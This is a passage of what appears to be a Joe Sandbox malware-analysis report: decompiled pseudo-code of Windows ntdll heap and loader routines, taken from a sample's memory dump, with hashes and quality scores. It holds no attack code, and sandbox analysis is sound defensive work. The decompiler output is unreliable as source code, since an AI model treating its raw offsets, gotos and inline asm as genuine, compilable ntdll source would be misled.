                    							_t91 =  &(_t419[8]); // -8
                    							_t262 = E016BD540(_t91, _t415, 0xfeeefeee);
                    							_v20 = _t262;
                    							__eflags = _t262 - _t415;
                    							if(_t262 != _t415) {
                    								_t357 =  *[fs:0x30];
                    								__eflags =  *(_t357 + 0xc);
                    								if( *(_t357 + 0xc) == 0) {
                    									_push("HEAP: ");
                    									E0166B150();
                    								} else {
                    									E0166B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                    								}
                    								_push(_v20 + 0x10 + _t419);
                    								E0166B150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t419);
                    								_t271 =  *[fs:0x30];
                    								_t421 = _t421 + 0xc;
                    								__eflags =  *((char*)(_t271 + 2));
                    								if( *((char*)(_t271 + 2)) != 0) {
                    									 *0x1756378 = 1;
                    									asm("int3");
                    									 *0x1756378 = 0;
                    								}
                    							}
                    						}
                    						_t381 = _a4;
                    						_t414 = _t419;
                    						_t419[1] = 0;
                    						_t419[3] = 0;
                    						 *_t381 =  *_t381 + ( *_t419 & 0x0000ffff);
                    						 *_t419 =  *_t381;
                    						 *(_t419 + 4 +  *_t381 * 8) =  *_t381 ^  *(_t307 + 0x54);
                    						L4:
                    						_t420 = _t414 +  *_t381 * 8;
                    						if( *(_t307 + 0x4c) == 0) {
                    							L6:
                    							while((( *(_t307 + 0x4c) >> 0x00000014 &  *(_t307 + 0x52) ^ _t420[0]) & 0x00000001) == 0) {
                    								__eflags =  *(_t307 + 0x4c);
                    								if( *(_t307 + 0x4c) != 0) {
                    									_t390 =  *(_t307 + 0x50) ^  *_t420;
                    									 *_t420 = _t390;
                    									_t328 = _t390 >> 0x00000010 ^ _t390 >> 0x00000008 ^ _t390;
                    									__eflags = _t390 >> 0x18 - _t328;
                    									if(__eflags != 0) {
                    										_push(_t328);
                    										E0171FA2B(_t307, _t307, _t420, _t414, _t420, __eflags);
                    									}
                    								}
                    								__eflags = _v5;
                    								if(_v5 == 0) {
                    									L94:
                    									_t382 = _t420[3];
                    									_t137 =  &(_t420[2]); // -16
                    									_t309 = _t137;
                    									_t186 =  *_t309;
                    									_v20 = _t186;
                    									_v16 = _t382;
                    									_t187 =  *((intOrPtr*)(_t186 + 4));
                    									__eflags =  *_t382 - _t187;
                    									if( *_t382 != _t187) {
                    										L63:
                    										_push(_t309);
                    										_push( *_t382);
                    										_push(_t187);
                    										_push(_t309);
                    										_push(0xd);
                    										L64:
                    										E0172A80D(_t307);
                    										continue;
                    									}
                    									__eflags =  *_t382 - _t309;
                    									if( *_t382 != _t309) {
                    										goto L63;
                    									}
                    									 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t420 & 0x0000ffff);
                    									_t393 =  *(_t307 + 0xb4);
                    									__eflags = _t393;
                    									if(_t393 == 0) {
                    										L104:
                    										_t330 = _v16;
                    										_t190 = _v20;
                    										 *_t330 = _t190;
                    										 *(_t190 + 4) = _t330;
                    										__eflags = _t420[0] & 0x00000008;
                    										if((_t420[0] & 0x00000008) == 0) {
                    											L107:
                    											_t331 = _t420[0];
                    											__eflags = _t331 & 0x00000004;
                    											if((_t331 & 0x00000004) != 0) {
                    												_t196 = ( *_t420 & 0x0000ffff) * 8 - 0x10;
                    												_v12 = _t196;
                    												__eflags = _t331 & 0x00000002;
                    												if((_t331 & 0x00000002) != 0) {
                    													__eflags = _t196 - 4;
                    													if(_t196 > 4) {
                    														_t196 = _t196 - 4;
                    														__eflags = _t196;
                    														_v12 = _t196;
                    													}
                    												}
                    												_t162 =  &(_t420[4]); // -8
                    												_t197 = E016BD540(_t162, _t196, 0xfeeefeee);
                    												_v20 = _t197;
                    												__eflags = _t197 - _v12;
                    												if(_t197 != _v12) {
                    													_t335 =  *[fs:0x30];
                    													__eflags =  *(_t335 + 0xc);
                    													if( *(_t335 + 0xc) == 0) {
                    														_push("HEAP: ");
                    														E0166B150();
                    													} else {
                    														E0166B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                    													}
                    													_push(_v20 + 0x10 + _t420);
                    													E0166B150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t420);
                    													_t203 =  *[fs:0x30];
                    													__eflags =  *((char*)(_t203 + 2));
                    													if( *((char*)(_t203 + 2)) != 0) {
                    														 *0x1756378 = 1;
                    														asm("int3");
                    														 *0x1756378 = 0;
                    													}
                    												}
                    											}
                    											_t394 = _a4;
                    											_t414[1] = 0;
                    											_t414[3] = 0;
                    											 *_t394 =  *_t394 + ( *_t420 & 0x0000ffff);
                    											 *_t414 =  *_t394;
                    											 *(_t414 + 4 +  *_t394 * 8) =  *_t394 ^  *(_t307 + 0x54);
                    											break;
                    										}
                    										_t207 = E0168A229(_t307, _t420);
                    										__eflags = _t207;
                    										if(_t207 != 0) {
                    											goto L107;
                    										}
                    										E0168A309(_t307, _t420,  *_t420 & 0x0000ffff, 1);
                    										continue;
                    									}
                    									_t342 =  *_t420 & 0x0000ffff;
                    									while(1) {
                    										__eflags = _t342 -  *((intOrPtr*)(_t393 + 4));
                    										if(_t342 <  *((intOrPtr*)(_t393 + 4))) {
                    											break;
                    										}
                    										_t210 =  *_t393;
                    										__eflags = _t210;
                    										if(_t210 == 0) {
                    											_t212 =  *((intOrPtr*)(_t393 + 4)) - 1;
                    											__eflags =  *((intOrPtr*)(_t393 + 4)) - 1;
                    											L103:
                    											_t146 =  &(_t420[2]); // -16
                    											E0168BC04(_t307, _t393, 1, _t146, _t212, _t342);
                    											goto L104;
                    										}
                    										_t393 = _t210;
                    									}
                    									_t212 = _t342;
                    									goto L103;
                    								} else {
                    									_t384 = _t414[6];
                    									_t102 =  &(_t414[4]); // -16
                    									_t311 = _t102;
                    									_t215 =  *_t311;
                    									_v20 = _t215;
                    									_v16 = _t384;
                    									_t216 =  *((intOrPtr*)(_t215 + 4));
                    									__eflags =  *_t384 - _t216;
                    									if( *_t384 != _t216) {
                    										L92:
                    										_push(_t311);
                    										_push( *_t384);
                    										E0172A80D(_t307, 0xd, _t311, _t216);
                    										L93:
                    										_v5 = 0;
                    										goto L94;
                    									}
                    									__eflags =  *_t384 - _t311;
                    									if( *_t384 != _t311) {
                    										goto L92;
                    									}
                    									 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t414 & 0x0000ffff);
                    									_t386 =  *(_t307 + 0xb4);
                    									__eflags = _t386;
                    									if(_t386 == 0) {
                    										L79:
                    										_t313 = _v16;
                    										_t219 = _v20;
                    										 *_t313 = _t219;
                    										 *(_t219 + 4) = _t313;
                    										__eflags = _t414[1] & 0x00000008;
                    										if((_t414[1] & 0x00000008) == 0) {
                    											L82:
                    											_t314 = _t414[1];
                    											__eflags = _t314 & 0x00000004;
                    											if((_t314 & 0x00000004) != 0) {
                    												_t221 = ( *_t414 & 0x0000ffff) * 8 - 0x10;
                    												_v12 = _t221;
                    												__eflags = _t314 & 0x00000002;
                    												if((_t314 & 0x00000002) != 0) {
                    													__eflags = _t221 - 4;
                    													if(_t221 > 4) {
                    														_t221 = _t221 - 4;
                    														__eflags = _t221;
                    														_v12 = _t221;
                    													}
                    												}
                    												_t127 =  &(_t414[8]); // -8
                    												_t222 = E016BD540(_t127, _t221, 0xfeeefeee);
                    												_v20 = _t222;
                    												__eflags = _t222 - _v12;
                    												if(_t222 != _v12) {
                    													_t316 =  *[fs:0x30];
                    													__eflags =  *(_t316 + 0xc);
                    													if( *(_t316 + 0xc) == 0) {
                    														_push("HEAP: ");
                    														E0166B150();
                    													} else {
                    														E0166B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                    													}
                    													_push(_v20 + 0x10 + _t414);
                    													E0166B150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t414);
                    													_t228 =  *[fs:0x30];
                    													_t421 = _t421 + 0xc;
                    													__eflags =  *((char*)(_t228 + 2));
                    													if( *((char*)(_t228 + 2)) != 0) {
                    														 *0x1756378 = 1;
                    														asm("int3");
                    														 *0x1756378 = 0;
                    													}
                    												}
                    											}
                    											goto L93;
                    										}
                    										_t232 = E0168A229(_t307, _t414);
                    										__eflags = _t232;
                    										if(_t232 != 0) {
                    											goto L82;
                    										}
                    										E0168A309(_t307, _t414,  *_t414 & 0x0000ffff, 1);
                    										goto L93;
                    									}
                    									_t323 =  *_t414 & 0x0000ffff;
                    									while(1) {
                    										__eflags = _t323 -  *((intOrPtr*)(_t386 + 4));
                    										if(_t323 <  *((intOrPtr*)(_t386 + 4))) {
                    											break;
                    										}
                    										_t235 =  *_t386;
                    										__eflags = _t235;
                    										if(_t235 == 0) {
                    											_t237 =  *((intOrPtr*)(_t386 + 4)) - 1;
                    											__eflags =  *((intOrPtr*)(_t386 + 4)) - 1;
                    											L78:
                    											_t111 =  &(_t414[4]); // -16
                    											E0168BC04(_t307, _t386, 1, _t111, _t237, _t323);
                    											goto L79;
                    										}
                    										_t386 = _t235;
                    									}
                    									_t237 = _t323;
                    									goto L78;
                    								}
                    							}
                    							return _t414;
                    						}
                    						_t398 =  *(_t307 + 0x50) ^  *_t420;
                    						_t347 = _t398 >> 0x00000010 ^ _t398 >> 0x00000008 ^ _t398;
                    						if(_t398 >> 0x18 != _t347) {
                    							_push(_t347);
                    							_push(0);
                    							_push(0);
                    							_push(_t420);
                    							_push(3);
                    							goto L64;
                    						}
                    						goto L6;
                    					} else {
                    						_t277 =  *_t419 & 0x0000ffff;
                    						_v16 = _t277;
                    						while(1) {
                    							__eflags = _t277 -  *((intOrPtr*)(_t404 + 4));
                    							if(_t277 <  *((intOrPtr*)(_t404 + 4))) {
                    								break;
                    							}
                    							_t279 =  *_t404;
                    							__eflags = _t279;
                    							if(_t279 == 0) {
                    								_t277 =  *((intOrPtr*)(_t404 + 4)) - 1;
                    								__eflags =  *((intOrPtr*)(_t404 + 4)) - 1;
                    								break;
                    							} else {
                    								_t404 = _t279;
                    								_t277 =  *_t419 & 0x0000ffff;
                    								continue;
                    							}
                    						}
                    						E0168BC04(_t307, _t404, 1, _t350, _t277, _v16);
                    						goto L20;
                    					}
                    				}
                    			}


                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                    • API String ID: 0-3178619729
                    • Opcode ID: 87fd42a63817da19b8cecef7faf9a59ca4b1e4b40e9c2d4954a05e3a47f9f246
                    • Instruction ID: c796218a04a3b93394305ea35b7c3f44bfc59af59cf461e22e8d2928cbcfc4bf
                    • Opcode Fuzzy Hash: 87fd42a63817da19b8cecef7faf9a59ca4b1e4b40e9c2d4954a05e3a47f9f246
                    • Instruction Fuzzy Hash: 0522F370A002429FEB25DF2DCC85B7ABBB5EF46704F18856DE8468B342D7B5D881CB50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 67%
                    			E0168B477(signed int __ecx, signed int* __edx) {
                    				signed int _v8;
                    				signed int _v12;
                    				intOrPtr* _v16;
                    				signed int* _v20;
                    				signed int _v24;
                    				char _v28;
                    				signed int _v44;
                    				char _v48;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				void* __ebp;
                    				signed int _t131;
                    				signed char _t134;
                    				signed int _t139;
                    				void* _t141;
                    				signed int* _t143;
                    				signed int* _t144;
                    				intOrPtr* _t147;
                    				char _t160;
                    				signed int* _t163;
                    				signed char* _t164;
                    				intOrPtr _t165;
                    				signed int* _t167;
                    				signed char* _t168;
                    				intOrPtr _t193;
                    				intOrPtr* _t195;
                    				signed int _t203;
                    				signed int _t209;
                    				signed int _t211;
                    				intOrPtr _t214;
                    				intOrPtr* _t231;
                    				intOrPtr* _t236;
                    				signed int _t237;
                    				intOrPtr* _t238;
                    				signed int _t240;
                    				intOrPtr _t241;
                    				char _t243;
                    				signed int _t252;
                    				signed int _t254;
                    				signed char _t259;
                    				signed int _t264;
                    				signed int _t268;
                    				intOrPtr _t277;
                    				unsigned int _t279;
                    				signed int* _t283;
                    				intOrPtr* _t284;
                    				unsigned int _t287;
                    				signed int _t291;
                    				signed int _t293;
                    
                    				_v8 =  *0x175d360 ^ _t293;
                    				_t223 = __edx;
                    				_v20 = __edx;
                    				_t291 = __ecx;
                    				_t276 =  *__edx;
                    				_t231 = E0168B8E4( *__edx);
                    				_t292 = __ecx + 0x8c;
                    				_v16 = _t231;
                    				if(_t231 == __ecx + 0x8c) {
                    					L38:
                    					_t131 = 0;
                    					L34:
                    					return E016AB640(_t131, _t223, _v8 ^ _t293, _t276, _t291, _t292);
                    				}
                    				if( *0x1758748 >= 1) {
                    					__eflags =  *((intOrPtr*)(_t231 + 0x14)) -  *__edx;
                    					if(__eflags < 0) {
                    						_t214 =  *[fs:0x30];
                    						__eflags =  *(_t214 + 0xc);
                    						if( *(_t214 + 0xc) == 0) {
                    							_push("HEAP: ");
                    							E0166B150();
                    						} else {
                    							E0166B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                    						}
                    						_push("(UCRBlock->Size >= *Size)");
                    						E0166B150();
                    						__eflags =  *0x1757bc8;
                    						if(__eflags == 0) {
                    							__eflags = 1;
                    							E01722073(_t223, 1, _t291, 1);
                    						}
                    						_t231 = _v16;
                    					}
                    				}
                    				_t5 = _t231 - 8; // -8
                    				_t292 = _t5;
                    				_t134 =  *((intOrPtr*)(_t292 + 6));
                    				if(_t134 != 0) {
                    					_t223 = (_t292 & 0xffff0000) - ((_t134 & 0x000000ff) << 0x10) + 0x10000;
                    				} else {
                    					_t223 = _t291;
                    				}
                    				_t276 = _v20;
                    				_v28 =  *((intOrPtr*)(_t231 + 0x10));
                    				_t139 =  *(_t291 + 0xcc) ^  *0x1758a68;
                    				_v12 = _t139;
                    				if(_t139 != 0) {
                    					 *0x175b1e0(_t291,  &_v28, _t276);
                    					_t141 = _v12();
                    					goto L8;
                    				} else {
                    					_t203 =  *((intOrPtr*)(_t231 + 0x14));
                    					_v12 = _t203;
                    					if(_t203 -  *_t276 <=  *(_t291 + 0x6c) << 3) {
                    						_t264 = _v12;
                    						__eflags = _t264 -  *(_t291 + 0x5c) << 3;
                    						if(__eflags < 0) {
                    							 *_t276 = _t264;
                    						}
                    					}
                    					_t209 =  *(_t291 + 0x40) & 0x00040000;
                    					asm("sbb ecx, ecx");
                    					_t268 = ( ~_t209 & 0x0000003c) + 4;
                    					_v12 = _t268;
                    					if(_t209 != 0) {
                    						_push(0);
                    						_push(0x14);
                    						_push( &_v48);
                    						_push(3);
                    						_push(_t291);
                    						_push(0xffffffff);
                    						_t211 = E016A9730();
                    						__eflags = _t211;
                    						if(_t211 < 0) {
                    							L56:
                    							_push(_t268);
                    							_t276 = _t291;
                    							E0172A80D(_t291, 1, _v44, 0);
                    							_t268 = 4;
                    							goto L7;
                    						}
                    						__eflags = _v44 & 0x00000060;
                    						if((_v44 & 0x00000060) == 0) {
                    							goto L56;
                    						}
                    						__eflags = _v48 - _t291;
                    						if(__eflags != 0) {
                    							goto L56;
                    						}
                    						_t268 = _v12;
                    					}
                    					L7:
                    					_push(_t268);
                    					_push(0x1000);
                    					_push(_v20);
                    					_push(0);
                    					_push( &_v28);
                    					_push(0xffffffff);
                    					_t141 = E016A9660();
                    					 *((intOrPtr*)(_t291 + 0x20c)) =  *((intOrPtr*)(_t291 + 0x20c)) + 1;
                    					L8:
                    					if(_t141 < 0) {
                    						 *((intOrPtr*)(_t291 + 0x214)) =  *((intOrPtr*)(_t291 + 0x214)) + 1;
                    						goto L38;
                    					}
                    					_t143 =  *( *[fs:0x30] + 0x50);
                    					if(_t143 != 0) {
                    						__eflags =  *_t143;
                    						if(__eflags == 0) {
                    							goto L10;
                    						}
                    						_t144 =  &(( *( *[fs:0x30] + 0x50))[0x89]);
                    						L11:
                    						if( *_t144 != 0) {
                    							__eflags =  *( *[fs:0x30] + 0x240) & 0x00000001;
                    							if(__eflags != 0) {
                    								E0172138A(_t223, _t291, _v28,  *_v20, 2);
                    							}
                    						}
                    						if( *((intOrPtr*)(_t291 + 0x4c)) != 0) {
                    							_t287 =  *(_t291 + 0x50) ^  *_t292;
                    							 *_t292 = _t287;
                    							_t259 = _t287 >> 0x00000010 ^ _t287 >> 0x00000008 ^ _t287;
                    							if(_t287 >> 0x18 != _t259) {
                    								_push(_t259);
                    								E0171FA2B(_t223, _t291, _t292, _t291, _t292, __eflags);
                    							}
                    						}
                    						_t147 = _v16 + 8;
                    						 *((char*)(_t292 + 2)) = 0;
                    						 *((char*)(_t292 + 7)) = 0;
                    						_t236 =  *((intOrPtr*)(_t147 + 4));
                    						_t277 =  *_t147;
                    						_v24 = _t236;
                    						_t237 =  *_t236;
                    						_v12 = _t237;
                    						_t238 = _v16;
                    						if(_t237 !=  *((intOrPtr*)(_t277 + 4)) || _v12 != _t147) {
                    							_push(_t238);
                    							_push(_v12);
                    							E0172A80D(0, 0xd, _t147,  *((intOrPtr*)(_t277 + 4)));
                    							_t238 = _v16;
                    						} else {
                    							_t195 = _v24;
                    							 *_t195 = _t277;
                    							 *((intOrPtr*)(_t277 + 4)) = _t195;
                    						}
                    						if( *(_t238 + 0x14) == 0) {
                    							L22:
                    							_t223[0x30] = _t223[0x30] - 1;
                    							_t223[0x2c] = _t223[0x2c] - ( *(_t238 + 0x14) >> 0xc);
                    							 *((intOrPtr*)(_t291 + 0x1e8)) =  *((intOrPtr*)(_t291 + 0x1e8)) +  *(_t238 + 0x14);
                    							 *((intOrPtr*)(_t291 + 0x1fc)) =  *((intOrPtr*)(_t291 + 0x1fc)) + 1;
                    							 *((intOrPtr*)(_t291 + 0x1f8)) =  *((intOrPtr*)(_t291 + 0x1f8)) - 1;
                    							_t279 =  *(_t238 + 0x14);
                    							if(_t279 >= 0x7f000) {
                    								 *((intOrPtr*)(_t291 + 0x1ec)) =  *((intOrPtr*)(_t291 + 0x1ec)) - _t279;
                    								_t279 =  *(_t238 + 0x14);
                    							}
                    							_t152 = _v20;
                    							_t240 =  *_v20;
                    							_v12 = _t240;
                    							_t241 = _v16;
                    							if(_t279 <= _t240) {
                    								__eflags =  *((intOrPtr*)(_t241 + 0x10)) + _t279 - _t223[0x28];
                    								if( *((intOrPtr*)(_t241 + 0x10)) + _t279 != _t223[0x28]) {
                    									 *_v20 = _v12 + ( *_t292 & 0x0000ffff) * 8;
                    									L26:
                    									_t243 = 0;
                    									 *((char*)(_t292 + 3)) = 0;
                    									_t276 = _t223[0x18];
                    									if(_t223[0x18] != _t223) {
                    										_t160 = (_t292 - _t223 >> 0x10) + 1;
                    										_v24 = _t160;
                    										__eflags = _t160 - 0xfe;
                    										if(_t160 >= 0xfe) {
                    											_push(0);
                    											_push(0);
                    											E0172A80D(_t276, 3, _t292, _t223);
                    											_t160 = _v24;
                    										}
                    										_t243 = _t160;
                    									}
                    									 *((char*)(_t292 + 6)) = _t243;
                    									_t163 =  *( *[fs:0x30] + 0x50);
                    									if(_t163 != 0) {
                    										__eflags =  *_t163;
                    										if( *_t163 == 0) {
                    											goto L28;
                    										}
                    										_t227 = 0x7ffe0380;
                    										_t164 =  &(( *( *[fs:0x30] + 0x50))[0x89]);
                    										goto L29;
                    									} else {
                    										L28:
                    										_t227 = 0x7ffe0380;
                    										_t164 = 0x7ffe0380;
                    										L29:
                    										if( *_t164 != 0) {
                    											_t165 =  *[fs:0x30];
                    											__eflags =  *(_t165 + 0x240) & 0x00000001;
                    											if(( *(_t165 + 0x240) & 0x00000001) != 0) {
                    												__eflags = E01687D50();
                    												if(__eflags != 0) {
                    													_t227 =  &(( *( *[fs:0x30] + 0x50))[0x89]);
                    													__eflags =  &(( *( *[fs:0x30] + 0x50))[0x89]);
                    												}
                    												_t276 = _t292;
                    												E01721582(_t227, _t291, _t292, __eflags,  *_v20,  *(_t291 + 0x74) << 3,  *_t227 & 0x000000ff);
                    											}
                    										}
                    										_t223 = 0x7ffe038a;
                    										_t167 =  *( *[fs:0x30] + 0x50);
                    										if(_t167 != 0) {
                    											__eflags =  *_t167;
                    											if( *_t167 == 0) {
                    												goto L31;
                    											}
                    											_t168 =  &(( *( *[fs:0x30] + 0x50))[0x8c]);
                    											goto L32;
                    										} else {
                    											L31:
                    											_t168 = _t223;
                    											L32:
                    											if( *_t168 != 0) {
                    												__eflags = E01687D50();
                    												if(__eflags != 0) {
                    													_t223 =  &(( *( *[fs:0x30] + 0x50))[0x8c]);
                    													__eflags =  &(( *( *[fs:0x30] + 0x50))[0x8c]);
                    												}
                    												_t276 = _t292;
                    												E01721582(_t223, _t291, _t292, __eflags,  *_v20,  *(_t291 + 0x74) << 3,  *_t223 & 0x000000ff);
                    											}
                    											_t131 = _t292;
                    											goto L34;
                    										}
                    									}
                    								}
                    								_t152 = _v20;
                    							}
                    							E0168B73D(_t291, _t223,  *((intOrPtr*)(_t241 + 0x10)) + _v12 + 0xffffffe8, _t279 - _v12, _t292, _t152);
                    							 *_v20 =  *_v20 << 3;
                    							goto L26;
                    						} else {
                    							_t283 =  *(_t291 + 0xb8);
                    							if(_t283 != 0) {
                    								_t190 =  *(_t238 + 0x14) >> 0xc;
                    								while(1) {
                    									__eflags = _t190 - _t283[1];
                    									if(_t190 < _t283[1]) {
                    										break;
                    									}
                    									_t252 =  *_t283;
                    									__eflags = _t252;
                    									_v24 = _t252;
                    									_t238 = _v16;
                    									if(_t252 == 0) {
                    										_t190 = _t283[1] - 1;
                    										__eflags = _t283[1] - 1;
                    										L70:
                    										E0168BC04(_t291, _t283, 0, _t238, _t190,  *(_t238 + 0x14));
                    										_t238 = _v16;
                    										goto L19;
                    									}
                    									_t283 = _v24;
                    								}
                    								goto L70;
                    							}
                    							L19:
                    							_t193 =  *_t238;
                    							_t284 =  *((intOrPtr*)(_t238 + 4));
                    							_t254 =  *((intOrPtr*)(_t193 + 4));
                    							_v24 = _t254;
                    							_t238 = _v16;
                    							if( *_t284 != _t254 ||  *_t284 != _t238) {
                    								_push(_t238);
                    								_push( *_t284);
                    								E0172A80D(0, 0xd, _t238, _v24);
                    								_t238 = _v16;
                    							} else {
                    								 *_t284 = _t193;
                    								 *((intOrPtr*)(_t193 + 4)) = _t284;
                    							}
                    							goto L22;
                    						}
                    					}
                    					L10:
                    					_t144 = 0x7ffe0380;
                    					goto L11;
                    				}
                    			}

                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                    • API String ID: 0-4253913091
                    • Opcode ID: 18e94a05143f0f42e7eb6bfcede0e057bb3253d5aa963e9d23245e6e68d86387
                    • Instruction ID: 2a77d9f2b5e6071fe0e85b56c6de457f8667d5878cb20adfbc3fb7fc1b2cf815
                    • Opcode Fuzzy Hash: 18e94a05143f0f42e7eb6bfcede0e057bb3253d5aa963e9d23245e6e68d86387
                    • Instruction Fuzzy Hash: 66E19D70A00206DFDB19DF68CC94B7ABBB5FF44304F1482A9E5169B391D770E982CBA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 83%
                    			E01678794(void* __ecx) {
                    				signed int _v0;
                    				char _v8;
                    				signed int _v12;
                    				void* _v16;
                    				signed int _v20;
                    				intOrPtr _v24;
                    				signed int _v28;
                    				signed int _v32;
                    				signed int _v40;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				void* __ebp;
                    				intOrPtr* _t77;
                    				signed int _t80;
                    				signed char _t81;
                    				signed int _t87;
                    				signed int _t91;
                    				void* _t92;
                    				void* _t94;
                    				signed int _t95;
                    				signed int _t103;
                    				signed int _t105;
                    				signed int _t110;
                    				signed int _t118;
                    				intOrPtr* _t121;
                    				intOrPtr _t122;
                    				signed int _t125;
                    				signed int _t129;
                    				signed int _t131;
                    				signed int _t134;
                    				signed int _t136;
                    				signed int _t143;
                    				signed int* _t147;
                    				signed int _t151;
                    				void* _t153;
                    				signed int* _t157;
                    				signed int _t159;
                    				signed int _t161;
                    				signed int _t166;
                    				signed int _t168;
                    
                    				_push(__ecx);
                    				_t153 = __ecx;
                    				_t159 = 0;
                    				_t121 = __ecx + 0x3c;
                    				if( *_t121 == 0) {
                    					L2:
                    					_t77 =  *((intOrPtr*)(_t153 + 0x58));
                    					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
                    						_t122 =  *((intOrPtr*)(_t153 + 0x20));
                    						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
                    						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
                    							L6:
                    							if(E0167934A() != 0) {
                    								_t159 = E016EA9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
                    								__eflags = _t159;
                    								if(_t159 < 0) {
                    									_t81 =  *0x1755780; // 0x0
                    									__eflags = _t81 & 0x00000003;
                    									if((_t81 & 0x00000003) != 0) {
                    										_push(_t159);
                    										E016E5510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
                    										_t81 =  *0x1755780; // 0x0
                    									}
                    									__eflags = _t81 & 0x00000010;
                    									if((_t81 & 0x00000010) != 0) {
                    										asm("int3");
                    									}
                    								}
                    							}
                    						} else {
                    							_t159 = E0167849B(0, _t122, _t153, _t159, _t180);
                    							if(_t159 >= 0) {
                    								goto L6;
                    							}
                    						}
                    						_t80 = _t159;
                    						goto L8;
                    					} else {
                    						_t125 = 0x13;
                    						asm("int 0x29");
                    						_push(0);
                    						_push(_t159);
                    						_t161 = _t125;
                    						_t87 =  *( *[fs:0x30] + 0x1e8);
                    						_t143 = 0;
                    						_v40 = _t161;
                    						_t118 = 0;
                    						_push(_t153);
                    						__eflags = _t87;
                    						if(_t87 != 0) {
                    							_t118 = _t87 + 0x5d8;
                    							__eflags = _t118;
                    							if(_t118 == 0) {
                    								L46:
                    								_t118 = 0;
                    							} else {
                    								__eflags =  *(_t118 + 0x30);
                    								if( *(_t118 + 0x30) == 0) {
                    									goto L46;
                    								}
                    							}
                    						}
                    						_v32 = 0;
                    						_v28 = 0;
                    						_v16 = 0;
                    						_v20 = 0;
                    						_v12 = 0;
                    						__eflags = _t118;
                    						if(_t118 != 0) {
                    							__eflags = _t161;
                    							if(_t161 != 0) {
                    								__eflags =  *(_t118 + 8);
                    								if( *(_t118 + 8) == 0) {
                    									L22:
                    									_t143 = 1;
                    									__eflags = 1;
                    								} else {
                    									_t19 = _t118 + 0x40; // 0x40
                    									_t156 = _t19;
                    									E01678999(_t19,  &_v16);
                    									__eflags = _v0;
                    									if(_v0 != 0) {
                    										__eflags = _v0 - 1;
                    										if(_v0 != 1) {
                    											goto L22;
                    										} else {
                    											_t128 =  *(_t161 + 0x64);
                    											__eflags =  *(_t161 + 0x64);
                    											if( *(_t161 + 0x64) == 0) {
                    												goto L22;
                    											} else {
                    												E01678999(_t128,  &_v12);
                    												_t147 = _v12;
                    												_t91 = 0;
                    												__eflags = 0;
                    												_t129 =  *_t147;
                    												while(1) {
                    													__eflags =  *((intOrPtr*)(0x1755c60 + _t91 * 8)) - _t129;
                    													if( *((intOrPtr*)(0x1755c60 + _t91 * 8)) == _t129) {
                    														break;
                    													}
                    													_t91 = _t91 + 1;
                    													__eflags = _t91 - 5;
                    													if(_t91 < 5) {
                    														continue;
                    													} else {
                    														_t131 = 0;
                    														__eflags = 0;
                    													}
                    													L37:
                    													__eflags = _t131;
                    													if(_t131 != 0) {
                    														goto L22;
                    													} else {
                    														__eflags = _v16 - _t147;
                    														if(_v16 != _t147) {
                    															goto L22;
                    														} else {
                    															E01682280(_t92, 0x17586cc);
                    															_t94 = E01739DFB( &_v20);
                    															__eflags = _t94 - 1;
                    															if(_t94 != 1) {
                    															}
                    															asm("movsd");
                    															asm("movsd");
                    															asm("movsd");
                    															asm("movsd");
                    															 *_t118 =  *_t118 + 1;
                    															asm("adc dword [ebx+0x4], 0x0");
                    															_t95 = E016961A0( &_v32);
                    															__eflags = _t95;
                    															if(_t95 != 0) {
                    																__eflags = _v32 | _v28;
                    																if((_v32 | _v28) != 0) {
                    																	_t71 = _t118 + 0x40; // 0x3f
                    																	_t134 = _t71;
                    																	goto L55;
                    																}
                    															}
                    															goto L30;
                    														}
                    													}
                    													goto L56;
                    												}
                    												_t92 = 0x1755c64 + _t91 * 8;
                    												asm("lock xadd [eax], ecx");
                    												_t131 = (_t129 | 0xffffffff) - 1;
                    												goto L37;
                    											}
                    										}
                    										goto L56;
                    									} else {
                    										_t143 = E01678A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
                    										__eflags = _t143;
                    										if(_t143 != 0) {
                    											_t157 = _v12;
                    											_t103 = 0;
                    											__eflags = 0;
                    											_t136 =  &(_t157[1]);
                    											 *(_t161 + 0x64) = _t136;
                    											_t151 =  *_t157;
                    											_v20 = _t136;
                    											while(1) {
